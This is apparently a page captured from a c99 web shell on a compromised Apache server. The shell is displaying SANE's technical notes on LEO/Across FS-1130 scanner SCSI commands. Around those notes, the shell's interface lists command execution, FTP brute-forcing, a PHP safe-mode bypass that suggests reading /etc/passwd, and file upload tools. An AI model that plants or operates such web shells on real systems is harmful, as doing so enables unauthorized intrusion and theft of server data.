!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/sane-backends-1.0.18/leo/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     leo.txt (3.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
          BACKEND LEO

Across Technologies FS-1130
(A rebadged LEO Technologies)
 000: 06 31 14 01 1f 00 00 00 41 43 52 4f 53 53 20 20    .1......ACROSS  
 016: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                    
 032: 31 2e 31 36 09 f6 0d b6 01 2c 01 2c 39 36 30 30    1.16.....,.,9600


LEO LEOScan S3:
 000: 06 31 14 01 1F 00 00 00 4C 45 4F 20 20 20 20 20    .1......LEO
 016: 4C 45 4F 53 63 61 6E 2D 53 33 20 20 20 20 20 20    LEOScan-S3
 032: 33 2E 30 31 09 F6 0D B6 01 2C 01 2C 39 36 30 30    3.01.....,.,9600

or
 000: 06 00 02 02 1f 00 00 00 4c 45 4f 00 00 00 00 00    ........LEO.....
 016: 4c 45 4f 53 63 61 6e 2d 53 33 00 00 00 00 00 00    LEOScan-S3......
 032: 31 2e 31 30                                        1.10 

Genius FS1130
 000: 06 31 14 01 1f 00 00 00 4b 59 45 20 43 4f 52 50    .1......KYE CORP
 016: 43 6f 6c 6f 72 50 61 67 65 2d 43 53 20 20 20 20    ColorPage-CS
 032: 31 2e 31 34                                        1.14 

/*--------------------------------------------------------------------------*/

SCSI commands supported by the FS-1130


TEST UNIT READY
00 00 00 00 00 00


INQUIRY
12 00 00 00 30 00
   8-15: vendor name
  16-31: product name
  32-35: firmware level
  36-37: scan area width in 1/300th of inches
  38-39: scan area length in 1/300th of inches
  40-41: max X resolution in dpi
  42-43: max Y resolution in dpi
  44-47: ?


SCAN
1B 00 00 00 00 00
Start a scan


SET WINDOW
24 00 00 00 00 00 30 00 00 00
Total length is 48 bytes
  01 = 0x2E (may be 0x30 - 2, ie total length -2)  
  07 = length (48-8 = 40 = 0x28)
  10-11 = X Resolution
  12-13 = Y resolution
  14-17 = X top left corner
  18-21 = Y top left corner
  22-25 = width  (size in inches * 300)
  26-29 = length (size in inches * 300)
  31 = 0x80 ?
  33 = scan mode
        0x00 = black & white
		0x01 = halftone
        0x02 = grayscale
        0x05 = color
  34 = bit depth  
        1 or 8
  37 = ? RIF + other
  43 = ? 0x01


READ
28 00 00 00 00 00 00 0B 28 00


SEND
2A 00 03 00 00 01 00 03 00 00 
2A 00 02 00 00 0F 00 01 00 00
  2 = data type code
    0x02 = halftone pattern
    0x03 = gamma - 3 colors with 256 bytes each


GET DATA BUFFER STATUS
34 00 00 00 00 00 00 00 10 00
  7-8 allocation length

  returned buffer is 0x10 bytes long.
  00 00 0D 00 00 00 03 D3 60 00 00 00 01 48 00 EE 
  
    0-2 = additional length (0x10-3 = 0x0D)
    6-8 = (?) total scan length
   9-11 = filled data buffer
  12-13 = number of lines left (decrease during a scan)
  14-15 = bytes per line (constant during a scan)  


/*--------------------------------------------------------------------------*/

Command sequence for the FS-1130

Setup the scan:
  TUR
  SET WINDOWS
  SEND gamma
  SEND haltone pattern (if halftone scan)
  SCAN
  TUR until scanner ready
  GET DATA BUFFER STATUS

loop until all data read:
  GET DATA BUFFER STATUS
  READ

park the CCD:
  SET WINDOWS
  TUR
  SCAN
  
/*--------------------------------------------------------------------------*/

Command sequence for the S3

It seems similar to the FS-1130 except that no gamma nor halftone pattern is sent.

Setup the scan:
  TUR
  SET WINDOWS
  SCAN
  TUR until scanner ready

loop until all data read:
  GET DATA BUFFER STATUS
  READ

park the CCD:
  SET WINDOWS
  SCAN

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0089 ]--